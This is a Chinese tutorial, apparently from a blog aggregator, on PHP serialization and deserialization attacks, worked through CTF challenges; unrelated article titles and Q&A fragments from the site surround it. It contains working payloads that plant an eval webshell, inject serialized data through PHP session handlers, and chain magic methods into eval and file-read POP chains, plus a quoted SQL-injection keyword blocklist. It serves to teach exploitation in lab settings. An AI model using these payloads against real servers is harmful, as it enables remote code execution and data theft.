- Java锁的逻辑(结合对象头和ObjectMonitor)
- 还在用饼状图?来瞧瞧这些炫酷的百分比可视化新图形(附代码实现)⛵
- 自动注册实体类到EntityFrameworkCore上下文,并适配ABP及ABPVNext
- 基于Sklearn机器学习代码实战
serialize() //将一个对象转换成一个字符串
unserialize() //将字符串还原成一个对象
通过序列化与反序列化我们可以很方便的在PHP中进行对象的传递。本质上反序列化是没有危害的。但是如果用户对数据可控那就可以利用反序列化构造payload攻击 。
<?php
highlight_file(__FILE__);
class sunset{
public $flag='flag{asdadasd}';
public $name='makabaka';
public $age='18';
}
$ctfer=new sunset(); //实例化一个对象
echo serialize($ctfer);
?>
O:6:"sunset":3:{s:4:"flag";s:14:"flag{asdadasd}";s:4:"name";s:8:"makabaka";s:3:"age";s:2:"18";} 。
这里的flag表示属性
s:4:"flag"
这里表示的是 flag属性名(变量名)为4个字符串长度 字符串 属性长度 属性值 这里是把上面序列化之后返回的数据进行反序列化 。
$str='O:6:"sunset":3:{s:4:"flag";s:14:"flag{asdadasd}";s:4:"name";s:8:"makabaka";s:3:"age";s:2:"18";}';
$a=unserialize($str);
var_dump($a);
public修饰的属性和方法可以在任何地方被访问,包括类的内部、子类和外部代码.
示例
<?php
class Person {
public $name;
public function sayHello() {
echo "Hello!";
}
}
$person = new Person();
echo $person->name; // 可以直接访问 public 属性
$person->sayHello(); // 可以直接调用 public 方法
?>
protected修饰的属性和方法只能在当前类及其子类中被访问,外部的代码访问不了 。
<?php
highlight_file(__FILE__);
class Person {
protected $name;
protected function sayHello() {
echo "Hello!";
}
}
class Student extends Person {
public function showName() {
echo $this->name; // 子类可以访问 protected 属性
$this->sayHello(); // 子类可以调用 protected 方法
}
}
$student = new Student();
$student->showName(); // 可以访问父类的 protected 属性和方法
echo $student->name; // 外部代码不能访问 protected 属性 会显示错误
$student->sayHello(); // 外部代码不能调用 protected 方法 会显示错误
?>
private修饰的属性和方法只能在当前类中被访问,子类和外部代码不能访问.
<?php
highlight_file(__FILE__);
class Person {
private $name;
private function sayHello() {
echo "Hello!";
}
}
class Student extends Person {
public function showName() {
echo $this->name; // 子类不能访问父类的 private 属性
$this->sayHello(); // 子类不能调用父类的 private 方法
}
}
$person = new Person();
echo $person->name; // 外部代码不能访问 private 属性 会发生报错
$person->sayHello(); // 外部代码不能调用 private 方法 会发生报错
?>
总结 。
在利用对PHP反序列化进行利用时,经常需要通过反序列化中的魔术方法,检查方法里有无敏感操作来进行利用.
__construct()//创建对象时触发
__destruct() //对象被销毁时触发
__call() //在对象上下文中调用不可访问的方法时触发
__callStatic() //在静态上下文中调用不可访问的方法时触发
__get() //用于从不可访问的属性读取数据
__set() //用于将数据写入不可访问的属性
__isset() //在不可访问的属性上调用isset()或empty()触发
__unset() //在不可访问的属性上使用unset()时触发
__invoke() //当脚本尝试将对象调用为函数时触发
__sleep() 方法是 PHP 中的一个魔术方法(magic method),用于在对象被序列化(serialized)时触发。在这个方法中,你可以指定哪些属性需要被序列化,哪些属性不需要被序列化.
具体来说,当调用 serialize() 函数将一个对象序列化时,PHP 会先自动调用对象的 __sleep() 方法,该方法需要返回一个数组,包含需要被序列化的属性名。然后 PHP 会将这些属性序列化成字符串.
假设有一个 User 类,它有一个私有属性 $password ,你不希望在序列化对象时将密码属性暴露出来。那么你可以在 User 类中实现 __sleep() 方法 。
<?php
highlight_file(__FILE__);
class User {
private $username;
private $password;
public function __construct($username, $password) {
$this->username = $username;
$this->password = $password;
}
public function __sleep() {
return array('username');
}
}
$user = new User('john', '123456');
$serialized = serialize($user);
echo $serialized;
在上面的例子中, User 类的 __sleep() 方法返回了一个只包含 $username 属性名的数组,这意味着在序列化对象时,只有用户名会被序列化。如果你运行上面的代码,你会看到输出的序列化字符串只包含了 username 属性的值.
关于序列化后的字符串中 s:14:"Userusername";s:4:"john"; 中的 s:14 ,实际上是指 "Userusername" 的长度为 12 个字符,而不是 10 或 14 个字符。这是因为在 PHP 序列化字符串中,每个字符串的前面都会有一个类似 s:6: 的字符串长度标识,表示该字符串的长度为 6 个字符。这个字符串长度标识包括 s: 、冒号和数字长度,加起来占用了 4 个字符,所以实际上字符串长度标识的长度为字符串长度加 2。在您的输出结果中, s:14:"Userusername";s:4:"john"; 中的 。
unserialize() 会检查是否存在一个 __wakeup() 方法。如果存在,则会先调用 __wakeup 方法,预先准备对象需要的资源 而 wakeup() 用于在从字符串反序列化为对象时自动调用。一个 PHP 对象被序列化成字符串并存储在文件、数据库或者通过网络传输时,我们可以使用 unserialize() 函数将其反序列化为一个 PHP 对象。在这个过程中,PHP 会自动调用该对象的 __wakeup() 方法,对其进行初始化.
__wakeup() 方法的作用是对一个对象进行一些必要的初始化操作。例如,如果一个对象中包含了一些需要进行身份验证的属性,那么在从字符串反序列化为对象时,就可以在 __wakeup() 方法中进行身份验证。或者如果一个对象中包含了一些需要在每次初始化时计算的属性,也可以在 __wakeup() 方法中进行计算 。
示例1:
<?php
highlight_file(__FILE__);
class User {
private $username;
private $password;
public function __construct($username, $password) {
$this->username = $username;
$this->password = $password;
}
public function __sleep() {
return array('username', 'password');
}
public function __wakeup() {
if (!$this->authenticate()) {
throw new Exception("Authentication failed");
}
}
private function authenticate() {
// 进行身份验证
}
}
$user = new User('john', '123456');
$serialized = serialize($user);
$unserialized = unserialize($serialized);
在上面的示例中 User 类实现了 __sleep() 和 __wakeup() 方法。 __sleep() 方法返回了一个包含 username 和 password 属性名的数组,表示只有这两个属性需要被序列化。 __wakeup() 方法会调用 authenticate() 方法进行身份验证。如果身份验证失败,则会抛出一个异常.
实例2
<?php
highlight_file(__FILE__);
class Caiji{
public function __construct($ID, $sex, $age){
$this->ID = $ID;
$this->sex = $sex;
$this->age = $age;
$this->info = sprintf("ID: %s, age: %d, sex: %s", $this->ID, $this->sex, $this->age);
}
public function getInfo(){
echo $this->info . '<br>';
}
/**
* serialize前调用 用于删选需要被序列化存储的成员变量
* @return array [description]
*/
public function __sleep(){
echo __METHOD__ . '<br>';
return ['ID', 'sex', 'age'];
}
/**
* unserialize前调用 用于预先准备对象资源
*/
public function __wakeup(){
echo __METHOD__ . '<br>';
$this->info = sprintf("ID: %s, age: %d, sex: %s", $this->ID, $this->sex, $this->age);
}
}
$me = new Caiji('Sunset', 20, 'man');
$me->getInfo();
//存在__sleep(函数,$info属性不会被存储
$temp = serialize($me);
echo $temp . '<br>';
$me = unserialize($temp);
//__wakeup()组装的$info
$me->getInfo();
?>
__toString() 方法用于一个类被当成字符串时应怎样回应。例如 echo $obj; 应该显示些什么。此方法必须返回一个字符串,否则将发出一条 E_RECOVERABLE_ERROR 级别的致命错误.
示例
<?php
highlight_file(__FILE__);
class Person {
public $name;
public $age;
public function __construct($name, $age) {
$this->name = $name;
$this->age = $age;
$this-> info=sprintf("name:%s,age:%s",$this->name,$this->age);
}
public function __toString() {
return $this->info;
}
}
$person = new Person("John", 30);
echo '__toString:'.$person.'<br>';
?>
__destruct 方法是 PHP 中的一个特殊方法,用于在对象实例被销毁时自动调用。该方法通常用于清理对象所占用的资源,例如关闭数据库连接、释放文件句柄等.
示例:
class Example {
private $resource;
public function __construct() {
$this->resource = fopen('example.txt', 'w');//打开文件
}
public function write($text) {
fwrite($this->resource, $text);
}
public function __destruct() {
fclose($this->resource);
}
}
// 创建实例并写入文件
$example = new Example();
$example->write('Big hacker!!!');
// 实例销毁时,__destruct 方法会自动关闭文件句柄
在上面的示例中, Example 类的构造函数打开了一个文件,并将其保存在 $resource 属性中。 write 方法使用该文件句柄将文本写入文件中.
当 $example 实例被销毁时, __destruct 方法会自动调用,关闭文件句柄以释放资源。这意味着在 write 方法执行后,即使没有调用 fclose 方法关闭文件,该文件也会被正确地关闭 。
具体 $example->write('Hello, world!'); 执 $example 变量, $example 对象将会被销毁,并且 __destruct 方法会被自动调用,关闭文件句柄。如果在此之后仍然有其他变量引用 $example 对象,那么对象不会被销毁,直到所有引用都被释放为止.
对象的生命周期取决于它的引用计数,只有当所有引用都被释放后,对象才会被销毁。 __destruct 方法会在对象销毁时自动调用,用于执行清理操作.
__construct()和__destruct()
construct
:当对象创建时会被调用,是在new对象时才调用, unserialize
时不对被自动调用 destruct()
: 当对象被销毁时自动调用,有新的对象创建 之后会自动销毁 相当于调用了 __construct
后一定会调用 __destruct
现在传入一个对象,他后面被销毁时会调用 destruct
实例
<?php
highlight_file(__FILE__);
class sunset{
public $name='makabaka';
function __construct()
{
echo "调用"."__construct";
echo "<br>";
}
function __destruct()
{
echo "调用"."__destruct";
echo "<br>";
}
}
$a= new sunset();
echo serialize($a);
echo "<br>";
?>
调用__construct
O:6:"sunset":1:{s:4:"name";s:8:"makabaka";}
调用__destruct
创建对象 sunset 调用 __construct 序列号之后调用 __destruct 销毁对象 。
__seelp()
和 __wakeup()
__seelp()
在对象被序列化之前调用 __wakeup()
在对象被反序列化之前调用 示例:
<?php
highlight_file(__FILE__);
class sunset{
public $name='makabaka';
function __construct()
{
echo "调用"."__construct";
echo "<br>";
}
function __destruct()
{
echo "调用"."__destruct";
echo "<br>";
}
function __sleep()
{
echo "调用"."__sleep";
echo "<br>";
return array("name");
}
function __wakeup()
{
echo "调用"."__wakeup";
echo "<br>";
}
}
$a= new sunset();
echo serialize($a);
$b=$_GET['b'];
echo "<br>";
unserialize($b);
?>
这里可以看出在序列化之前调用了 __sleep 方法然后进行销毁 。
<?php
highlight_file(__FILE__);
class sunset {
public $name = 'makabaka';
function __construct() {
echo "调用 " . __METHOD__;
echo "<br>";
}
function __destruct() {
echo "调用 " . __METHOD__;
echo "<br>";
}
function __sleep() {
echo "调用 " . __METHOD__;
echo "<br>";
return array("name");
}
function __wakeup() {
echo "调用 " . __METHOD__;
echo "<br>";
}
}
if (isset($_POST['submit'])) {
$b = $_POST['a'];
unserialize($b);
}
?>
<form method="POST">
<input type="text" name="a" value='O:6:"sunset":1:{s:4:"name";s:8:"makabaka";}'>
<input type="submit" name="submit" value="提交">
</form>
这里我们直接提交序列化的内容就调用了 __wakeup 。
__toString()
__toString作为pop链关键的一步,很容易被调用。当对象被当作字符串的时候, __toString() 会被调用,不管对象有没有被打印出来,在对象被操作的时候,对象在和其他的字符串做比较的时候也会被调用.
<?php
highlight_file(__FILE__);
class sunset {
public $name = 'makabaka';
function __construct() {
echo "调用 " ." __construct()";
echo "<br>";
}
function __destruct() {
echo "调用 " . "__destruct()";
echo "<br>";
}
function __toString() {
echo "调用 " . "__toString";
echo "<br>";
return array("name");
}
}
$a= new sunset();
echo $a;
__invoke()
__invoke :当尝试以调用 函数 的方式调用一个 对象 时, __invoke() 方法会被自动调用,而调用函数的方式就是在后面加上 () ,当我们看到像 return $function(); 这种语句时,就应该意识到后面可能会调用 __invoke() ,下图是直接在对象后面加 () 调用 (这个魔术方法只在PHP 5.3.0 及以上版本有效) 。
<?php
highlight_file(__FILE__);
class sunset {
public $name = 'makabaka';
function __construct() {
echo "调用 " ." __construct()";
echo "<br>";
}
function __destruct() {
echo "调用 " . "__destruct()";
echo "<br>";
}
function __invoke() {
echo "调用 " . "__invoke";
echo "<br>";
}
}
$a= new sunset();
$a();
__get()和__set()
__get()
:从 不可访问的属性中 读取数据,或者说是调用一个类及其父类方法中未定义属性时 __set()
:当给一个未定义的属性赋值时,或者修改一个不能被修改的属性时( private protected
)(用的不多)
<?php
highlight_file(__FILE__);
class sunset {
public $name = 'makabaka';
public $str = 'hello';
function __construct() {
echo "调用 " ." __construct()";
echo "<br>";
}
function __destruct() {
echo "调用 " . "__destruct()";
echo "<br>";
}
function __get($b) {
echo "调用 " . "__get";
echo "<br>";
return $this->str;
}
}
$a= new sunset();
echo $a->makk;
这里创建一个对象调用了 __construct 然后echo 指向的mkk没有被定义然后调用 __get() 。
__call()
和 __callStatic()
__call
:在对象中调用类中不存在的方法时,或者是不可访问方法时被调用 __callStatic
:在静态上下文中调用一个不可访问静态方法时被调用
<?php
highlight_file(__FILE__);
class sunset {
public $name = 'makabaka';
public $str = 'hello';
function __construct() {
echo "调用 " ." __construct()";
echo "<br>";
}
function __destruct() {
echo "调用 " . "__destruct()";
echo "<br>";
}
function __call($b,$q) {
echo "调用 " . "__call";
echo "<br>";
return $this->str;
}
}
$a= new sunset();
echo $a->makk();
这里调用makk()方法不存在调用__call 。
__isset():当对不可访问属性调用isset()或empty()时调用
__unset():当对不可访问属性调用unset()时被调用。
__set_state():调用var_export()导出类时,此静态方法会被调用。
__clone():当对象复制完成时调用
__autoload():尝试加载未定义的类
__debugInfo():打印所需调试信息
参考手册 。
地址 。
这是一个有关于php序列化的题目 。
<?php
class xctf{
public $flag = '111';
public function __wakeup(){
exit('bad requests');
}
}
$a= new xctf();
print(serialize($a));
?>
这里绕过__wakeup的方法就是属性值大于他之前的属性值 这里面就只有一个属性值 flag111 只要超过这个属性值就可以绕过 。
<?php
error_reporting(0);
include "flag.php";
$KEY = "sunset";
$str = $_GET['str'];
if (unserialize($str) === "$KEY")
{
echo "$flag";
}
echo serialize($KEY);
$a='s:6:"sunset"';
$b= unserialize($a);
echo $b;
show_source(__FILE__);
通过分析代码我们需要通过get传入一个str值然后这传入的值进行反序列化之后就与$KEY相等就可以返回flag 。
构造payload: http://127.0.0.1/1.php?str=s:6:"sunset" ,
版本限制 PHP5:<5.6.25 。
PHP7:<7.0.10 。
<?php
error_reporting(0);
class sunset{
public $name='makabaka';
public $age='18';
function __wakeup(){
$this->age = "18";
}
function __destruct(){
$path='flag.php';
$file_get=file_put_contents($path,$this->name);
}
}
$flag = $_GET['flag'];
$unser = unserialize($flag);
在代码中这里用到了反序列化函数 unserialize , 只要用到这个函数是里面就会检测类sunset 里面有没有__wakeup()方法 ,如果有的话就会执行这个方法 这里的 wakeup()没有太大的作用然后后面的 __destruct打开了一个flag.php文件,然后把$this-->name 的值作为内容写入flag.php里面 。
O:6:"sunset":2:{s:4:"makabaka"}
对上面代码进行序列化 。
在上面的代码中我们可以看到 destruct 方法把name的东西写入 flag.php 里面这里我们可以直接写入shell 。
但是由于进行 destruct 之前会进行 wakeup 方法 所以需要先绕过 wakeup 这里需要增加类的属性值使大于类里面的就可以绕过>2 。
http://127.0.0.1/1.php/?flag=O:6:%22sunset%22:5:{s:4:%22name%22;s:41:%22%3C?php%20phpinfo();@eval($_POST[%27shell%27]);?%3E%22;s:3:%22age%22;s:2:%2218%22;}
<?php
class SoFun{
protected $file='index.php';
function __destruct(){
if(!empty($this->file)) {
if(strchr($this-> file,"\\")===false && strchr($this->file, '/')===false)
show_source(dirname (__FILE__).'/'.$this ->file);// 读取文件里面的内容
else
die('Wrong filename.');
}
}
function __wakeup(){
$this-> file='index.php';
}
public function __toString()//必须返回一个字符串
{ return '' ;
}
}
if (!isset($_GET['file'])){
show_source('index.php');
}
else{
$file=base64_decode($_GET['file']);
echo unserialize($file);
}
?> #<!--key in flag.php-->
绕过__wakeup()
:O:5:"SoFun": 2 : 上面类的属性为 protected 可以加上 \00*\00绕过之后进行base64绕过 。
http://127.0.0.1/index.php?file=Tzo1OiJTb0Z1biI6Mjp7Uzo3OiJcMDAqXDAwZmlsZSI7czo4OiJmbGFnLnBocCI7fQ==
PHP在session存储和读取时,都会有一个序列化和反序列化的过程,PHP内置了多种处理器用于存取 $_SESSION 数据,都会对数据进行序列化和反序列化 在php.ini中有以下配置项,wamp的默认配置如图 。
session.save_path 设置session的存储路径 session.save_handler 设定用户自定义存储函数如果想使用PHP内置会话存储机制之外的可以使用本函数(数据库等方式) session.auto_start 指定会话模块是否在请求开始时启动一个会话 session.serialize_handler 定义用来序列化/反序列化的处理器名字。默认使用php(<5.5.4) 。
php中session中的内容是以文件方式来存储的,由由 session.save_handler 来决定。文件名由 sess_sessionid 命名,文件内容则为session序列化后的值.
session.serialize_handler是用来设置session的序列化引擎的,除了默认的PHP引擎之外,还存在其他引擎,不同的引擎所对应的session的存储方式不相同.
引擎 | session存储方式 |
---|---|
php(php<5.5.4) | 存储方式是,键名+竖线` |
php_serialize(php>5.5.4) | 存储方式是,经过serialize()函数序列化处理的键和值(将session中的key和value都会进行序列化) |
php_binary | 存储方式是,键名的长度对应的ASCII字符+键名+经过serialize()函数序列化处理的值 |
在PHP (php<5.5.4) 中默认使用的是PHP引擎,如果要修改为其他的引擎,只需要添加代码 ini_set('session.serialize_handler', '需要设置的引擎名'); 进行设置 。
<?php
ini_set('session.serialize_handler','php_serialize');
session_start();
$_SESSION['name'] = 'sunset';
?>
这里汇总seesion存储路径存储一个序列化后的文件 。
内容为 a:1:{s:4:"name";s:6:"sunset";} 。
其中 a:1 是使用php_serialize引擎都会加上的,同时使用 php_serialize会把session里面的key和value都会反序列化 。
<?php
session_start();
$_SESSION['name'] = 'sunset';
?>
内容为 name|s:6:"sunset",
这里name 为键值 s:6:"sunset" 是sunset序列化后的结果 。
php引擎存储方式为: 键值名 | 序列化后的值 。
<?php
highlight_file(__FILE__);
ini_set('session.serialize_handler','php_binary');
session_start();
$_SESSION['name'] = 'sunset';
?>
返回值 。
names:6:"sunset";
前面那个是一个特殊字符 因为 php_binary 序列化的过程中,会把数据编码为二进制格式,需要把数据长度信息加入到编码数据的开头,这样在解码的时候才可以读取数据,也是为了在解码的时候确定数据的长度。 实质上是不可见字符,然后可以对照ascii表 。
访问www.zip 文件拿到源码 。
<?php
error_reporting(0);
session_start();
//超过5次禁止登陆
if(isset($_SESSION['limit'])){
$_SESSION['limti']>5?die("登陆失败次数超过限制"):$_SESSION['limit']=base64_decode($_COOKIE['limit']);
$_COOKIE['limit'] = base64_encode(base64_decode($_COOKIE['limit']) +1);
}else{
setcookie("limit",base64_encode('1'));
$_SESSION['limit']= 1;
}
?>
<?php
error_reporting(0);
require_once 'inc/inc.php';
$GET = array("u"=>$_GET['u'],"pass"=>$_GET['pass']);
if($GET){
$data= $db->get('admin',
[ 'id',
'UserName0'
],[
"AND"=>[
"UserName0[=]"=>$GET['u'],
"PassWord1[=]"=>$GET['pass'] //密码必须为128位大小写字母+数字+特殊符号,防止爆破
]
]);
if($data['id']){
//登陆成功取消次数累计
$_SESSION['limit']= 0;
echo json_encode(array("success","msg"=>"欢迎您".$data['UserName0']));
}else{
//登陆失败累计次数加1
$_COOKIE['limit'] = base64_encode(base64_decode($_COOKIE['limit'])+1);
echo json_encode(array("error","msg"=>"登陆失败"));
}
}
<?php
error_reporting(0);
ini_set('display_errors', 0);
ini_set('session.serialize_handler', 'php');
date_default_timezone_set("Asia/Shanghai");
session_start();
use \CTFSHOW\CTFSHOW;
require_once 'CTFSHOW.php';
$db = new CTFSHOW([
'database_type' => 'mysql',
'database_name' => 'web',
'server' => 'localhost',
'username' => 'root',
'password' => 'root',
'charset' => 'utf8',
'port' => 3306,
'prefix' => '',
'option' => [
PDO::ATTR_CASE => PDO::CASE_NATURAL
]
]);
// sql注入检查
function checkForm($str){
if(!isset($str)){
return true;
}else{
return preg_match("/select|update|drop|union|and|or|ascii|if|sys|substr|sleep|from|where|0x|hex|bin|char|file|ord|limit|by|\`|\~|\!|\@|\#|\\$|\%|\^|\\|\&|\*|\(|\)|\(|\)|\+|\=|\[|\]|\;|\:|\'|\"|\<|\,|\>|\?/i",$str);
}
}
class User{
public $username;
public $password;
public $status;
function __construct($username,$password){
$this->username = $username;
$this->password = $password;
}
function setStatus($s){
$this->status=$s;
}
function __destruct(){
file_put_contents("log-".$this->username, "使用".$this->password."登陆".($this->status?"成功":"失败")."----".date_create()->format('Y-m-d H:i:s'));
}
}
/*生成唯一标志
*标准的UUID格式为:xxxxxxxx-xxxx-xxxx-xxxxxx-xxxxxxxxxx(8-4-4-4-12)
*/
function uuid()
{
$chars = md5(uniqid(mt_rand(), true));
$uuid = substr ( $chars, 0, 8 ) . '-'
. substr ( $chars, 8, 4 ) . '-'
. substr ( $chars, 12, 4 ) . '-'
. substr ( $chars, 16, 4 ) . '-'
. substr ( $chars, 20, 12 );
return $uuid ;
}
根据index.php 源码 $_SESSION['limti']>5?die("登陆失败次数超过限制"):$_SESSION['limit']=base64_decode($_COOKIE['limit']); 前面的 $_SESSION['limiti'] 导致后续条件不可能成立,而 inc.php 文件里面设定了指定的php解释器为php的 里面session_start(); 会对session文件进行解析,进行反序列化 。
inc.php文件 。
抓取数据包 。
通过解码发现limit为1 。
<?php
highlight_file(__FILE__);
class User{
public $username='shell.php';
public $password = '<?php phpinfo();@eval($_POST["shell"]);?>';
}
echo $a=base64_encode("|".serialize(new User));
echo "log-"."shell.php";
然后通过抓包修改cookie limit 字段 。
写入成功 。
然后访问inc/inc.php触发条件 在 check.php 和 inc/inc.php 页面反序列化的时候|前面的会被看做键名,会对|后面的进行反序列化 。
ctfshow{1eb5b22f-96d0-45a7-bebe-bec221b32fec} 。
魔术方法运行的先后顺序 。
利用现有的环境,找到一系列的代码或者调用指令,然后构造成一组连续的调用链,然后进行攻击。任何一条链子的构造,我们都要先找到它的头和尾,pop链也不例外,pop链的头部一般是用户能传入参数的地方,而尾部是可以执行我们操作的地方,比如说读写文件,执行命令等等;找到头尾之后,从尾部(我们执行操作的地方)开始,看它在哪个方法中,怎么样可以调用它,一层一层往上倒推,直到推到头部为止,也就是我们传参的地方,一条pop链子就出来了;在ctf中,头部一般都会是GET或者POST传参,然后可能就有一个 unserialize 直接将我们传入的参数反序列化了,尾部都是拿flag的地方;然后一环连着一环构成pop链 。
有php反序列化漏洞是因为有不安全的魔术方法,魔术方法会自己调用,我们构造恶意的exp就可以来触发他,有时候的漏洞代码不在魔术方法里面,在普通的方法中,我们应该寻找魔术方法是否调用了同名的函数,然后用同名函数名和类的属性和魔术方法联系起来 。
<?php
class test {
protected $ClassObj;
function __construct() {
$this->ClassObj = new normal();
}
function __destruct() {
$this->ClassObj->action();
}
}
class normal {
function action() {
echo "HelloWorld";
}
}
class evil {
private $data;
function action() {
eval($this->data);
}
}
unserialize($_GET['a']);
?>
上面代码的危险函数是evil类里面的 eval 我们需要把命令写入eval()里面,这里的action()函数有2个我们需要调用的是下面的 class evil 这里代码的流程是先有一个 test 类然后我们创建对象的时候调用 __construct 方法之后会在创建一个新的 normal 对象然后就调用了函数 action() 输出 HelloWorld 。
这里可以先创建一个test类然后利用test类创建一个 evil 对象再通过对象写入危险函数 。
<?php
highlight_file(__FILE__);
class test {
protected $ClassObj;
function __construct() {
$this->ClassObj = new evil();
}
function __destruct() {
$this->ClassObj->action();
}
}
class evil {
private $data='phpinfo();';
}
$b= new test();
echo urlencode(serialize($b));
///http://127.0.0.1/1.php?a=O%3A4%3A%22test%22%3A1%3A%7Bs%3A11%3A%22%00%2A%00ClassObj%22%3BO%3A4%3A%22evil%22%3A1%3A%7Bs%3A10%3A%22%00evil%00data%22%3Bs%3A10%3A%22phpinfo%28%29%3B%22%3B%7D%7D
<?php
highlight_file(__FILE__);
class Hello
{
public $source;
public $str;
public function __construct($name)
{
$this->str=$name;
}
public function __destruct()
{
$this->source=$this->str;
echo $this->source;
}
}
class Show
{
public $source;
public $str;
public function __toString()
{
$content = $this->str['str']->source;
return $content;
}
}
class Uwant
{
public $params;
public function __construct(){
$this->params='phpinfo();';
}
public function __get($key){
return $this->getshell($this->params);
}
public function getshell($value)
{
eval($this->params);
}
}
$a = $_GET['a'];
unserialize($a);
?>
通过GET传入a参数 --> 对传入的内容进行反序列化 --> 分别传入 Hello Show Uwant 里面 --> 创建 Hello 类的对象时候调用 __construct 方法把传递的参数存在了 $str 里面在该对象被销毁的时候调用 __destruct 方法,并且把 $str 的值给到了 $source 里面并且通过echo输出,然后创建 Show 对象会调用 __toString 方法返回 $str 的值 str['str']->source ,创建 Uwant 方法的时候调用了 __construct 然后把 phpinfo(); 存入了 $params 里面然后访问这个属性时 然后get没有$key参数 会调用 __get 方法并且调用 getshell)() 方法然后把 $params 里面的内容写到 eval 然后输出 。
这里需要先把 Hello 类里面的 $this-->str 变成对象这样才可以继续让 Show 里面的类 __toString 执行,然后把 Show 类的 $this->str['str'] 赋值成对象,来调用 Uwant 类中的 __get() 。
<?php
highlight_file(__FILE__);
class Hello
{
public $source;
public $str;
}
class Show
{
public $source;
public $str;
}
class Uwant
{
public $params='phpinfo();';
}
$a = new Hello();
$b = new Show();
$c = new Uwant();
$a -> str = $b;
$b -> str['str'] = $c;
echo urlencode(serialize($a));
[MRCTF2020]Ezpop 。
<?php
//flag is in flag.php
//WTF IS THIS?
//Learn From https://ctf.ieki.xyz/library/php.html#%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E9%AD%94%E6%9C%AF%E6%96%B9%E6%B3%95
//And Crack It!
class Modifier {
protected $var;
public function append($value){
include($value);
}
public function __invoke(){
$this->append($this->var);
}
}
class Show{
public $source;
public $str;
public function __construct($file='index.php'){
$this->source = $file;
echo 'Welcome to '.$this->source."<br>";
}
public function __toString(){
return $this->str->source;
}
public function __wakeup(){
if(preg_match("/gopher|http|file|ftp|https|dict|\.\./i", $this->source)) {
echo "hacker";
$this->source = "index.php";
}
}
}
class Test{
public $p;
public function __construct(){
$this->p = array();
}
public function __get($key){
$function = $this->p;
return $function(); //这会直接调用到__invoke
}
}
if(isset($_GET['pop'])){
@unserialize($_GET['pop']);
}
else{
$a=new Show;
highlight_file(__FILE__);
}
这里通过get方法传入一个get参数,如果没有传入pop参数然后就调用 Show 方法 显示源码,这里的思路就是在 Modifier 类里面有一个 include 函数如果可以调用就可以通过文件包含,包含 flag.php 文件然后使用php伪协议就可以获取flag 。
有关 Test 类的魔术方法简介就往 __invoke 看 。
Show 类 。
__wakeup 在反序列化的时候会直接被触发里面的正则匹配了一些敏感的关键词 然后 preg_match 函数对s ource进行访问会触发 __toString 然后这个方法又会访问str里面的source 我们创建一个新的 Test 类,里面没有source,然后会触发 __get() 方法,函数返回的时候我们再创建一个 Modifier 类 之后又会触发 __invoke 方法然后用 Modifier 的var读取flag.php 。
头 -> Show::__wakeup() -> Show::__toString() -> Test::__get() -> Modifier::__invoke() -> Modifier::append -> 尾 。
<?php
class Modifier {
protected $var = 'php://filter/read=convert.base64-encode/resource=flag.php';
}
class Show{
public $source;
public $str;
public function __construct()
{
$this->str=new Test();
}
}
class Test{
public $p;
public function __get($key)
{
$function = $this->p;
return $function();
}
}
$hack=new Show();
$hack->source=new Show();
$hack->source->str->p=new Modifier();
echo urlencode(serialize($hack));
flag{197b01ca-3562-4896-aedf-812a5686bb24} 。
最后此篇关于PHP的序列化和反序列化入门的文章就讲到这里了,如果你想了解更多关于PHP的序列化和反序列化入门的内容请搜索CFSDN的文章或继续浏览相关文章,希望大家以后支持我的博客! 。
我目前正在对一个 mmorpg 的二进制网络协议(protocol)进行逆向工程。我正在用 java 实现该协议(protocol)。 对于每个数据包类型,我将创建一个表示二进制数据的类。 例如,聊天
我正在尝试围绕现有类编写半透明包装器,我希望它能够模仿其他类的序列化。 例如,给定以下类: class Foo { [JsonConverter(CustomConverter)] s
是否有使用 Jackson 序列化和反序列化枚举集的简单方法? private enum Type { YES, NO } @JacksonXmlProperty(localName = "t
我很想知道当我们反序列化一个对象时会发生什么。 例如,如果我的类对象由许多其他对象组成,对象创建过程如何在反序列化过程中发生 最佳答案 对象是用默认的初始化字段创建的,然后用从串行流中获取的属性值填充
我正在尝试序列化和反序列化(使用 QDataStream 但这与这里无关)一个 enum class变量: enum class Type : char { Trivial, Comp
我不确定这到底有什么问题...它不会为我编译,我将它从 c 翻译成 C++(或尝试)...是的,我是初学者。谢谢! #include #include using namespace std; i
我遇到的问题与此处描述的问题非常相似:Combining type and field serializers case class(id: Option[UUID], otherValue:Stri
我们知道base中的apply()可以对数组的边距应用一个函数,边距应该是行或列。我想将边距扩大到“对角线” 和“反对角线”。结构看起来像 diagApply <- function(x, FUN,
我找到了 JSON serialization and deserialization to objects in Flutter 的例子但是如何使用像这样的人员列表来做到这一点: [ {
我有一个相当大的terms聚合结果,这些结果被加载到下拉列表中以提供filter功能。 可以说,我的下拉列表中有4000多种动物。我的另一个下拉列表有4种动物颜色。 例, animal --> ["d
我需要将 C# (.NET Framework 4.5.2) 中的一个类与 XML 序列化(反序列化),该类具有 string 的字典属性。键和 string[]数组值。我正在使用 Serializa
[已解决]应用给定的解决方案,效果很好! 程序的目的:在用户打开和关闭程序时保存/重新加载以前的数据。 我曾经用一个对象(obj)成功(反)序列化,现在我有两个不同类的不同对象。 我试图通过查看其他帖
问题 假设我有一个代表某事或其他的枚举: public enum ResultState { Found, Deleted, NotFound } 在我的序列化 json 中,
是否有取消 JSON 字符串的功能?我猜它不会内置到 JQuery 中,但它可以通过编写一个操纵字符串的脚本来实现吗?我在下面遇到了这个问题。 我正在使用 NYTimes API,但它不支持 JSON
对于这个问题,假设当对象完全写入流并成功读出时,或者当对象部分写入流并且读回对象时发生异常时,序列化/反序列化是原子的。假设写操作可能无法成功完成,例如因为停电了。 在Serializable的描述中
有谁知道时序检查是否仍在检测虚拟环境?我尝试使用 rdtsc 指令来获取 cpu 周期并比较真实 linux 机器和在 virtualbox 上运行的 linux 之间的结果。但结果似乎不稳定。有时,
我正在对一个(外部给定的)XML 文件进行操作,该文件具有以下形式的元素 10 20 30 40 50 60 70 80 我知道如何将属性作为属性处理(通过使用 [XmlAttri
我有一个通用的序列化器和反序列化器,用于通过网络连接发送的消息: public static async Task SerializeObject(Object obj) {
我正在考虑将当前基于 WCF 的应用程序迁移到 protobuf-net.Grpc。这似乎是可行的,但是我无法在不包含所有具有 [ProtoInclude] 属性的派生类的情况下使(DTO 类)基类的
我正在尝试将一些数据保存到文件中,但文件保存到的目录不正确。 using (StreamWriter sw = new StreamWriter(dir + "\\temp" + x + ".txt"
我是一名优秀的程序员,十分优秀!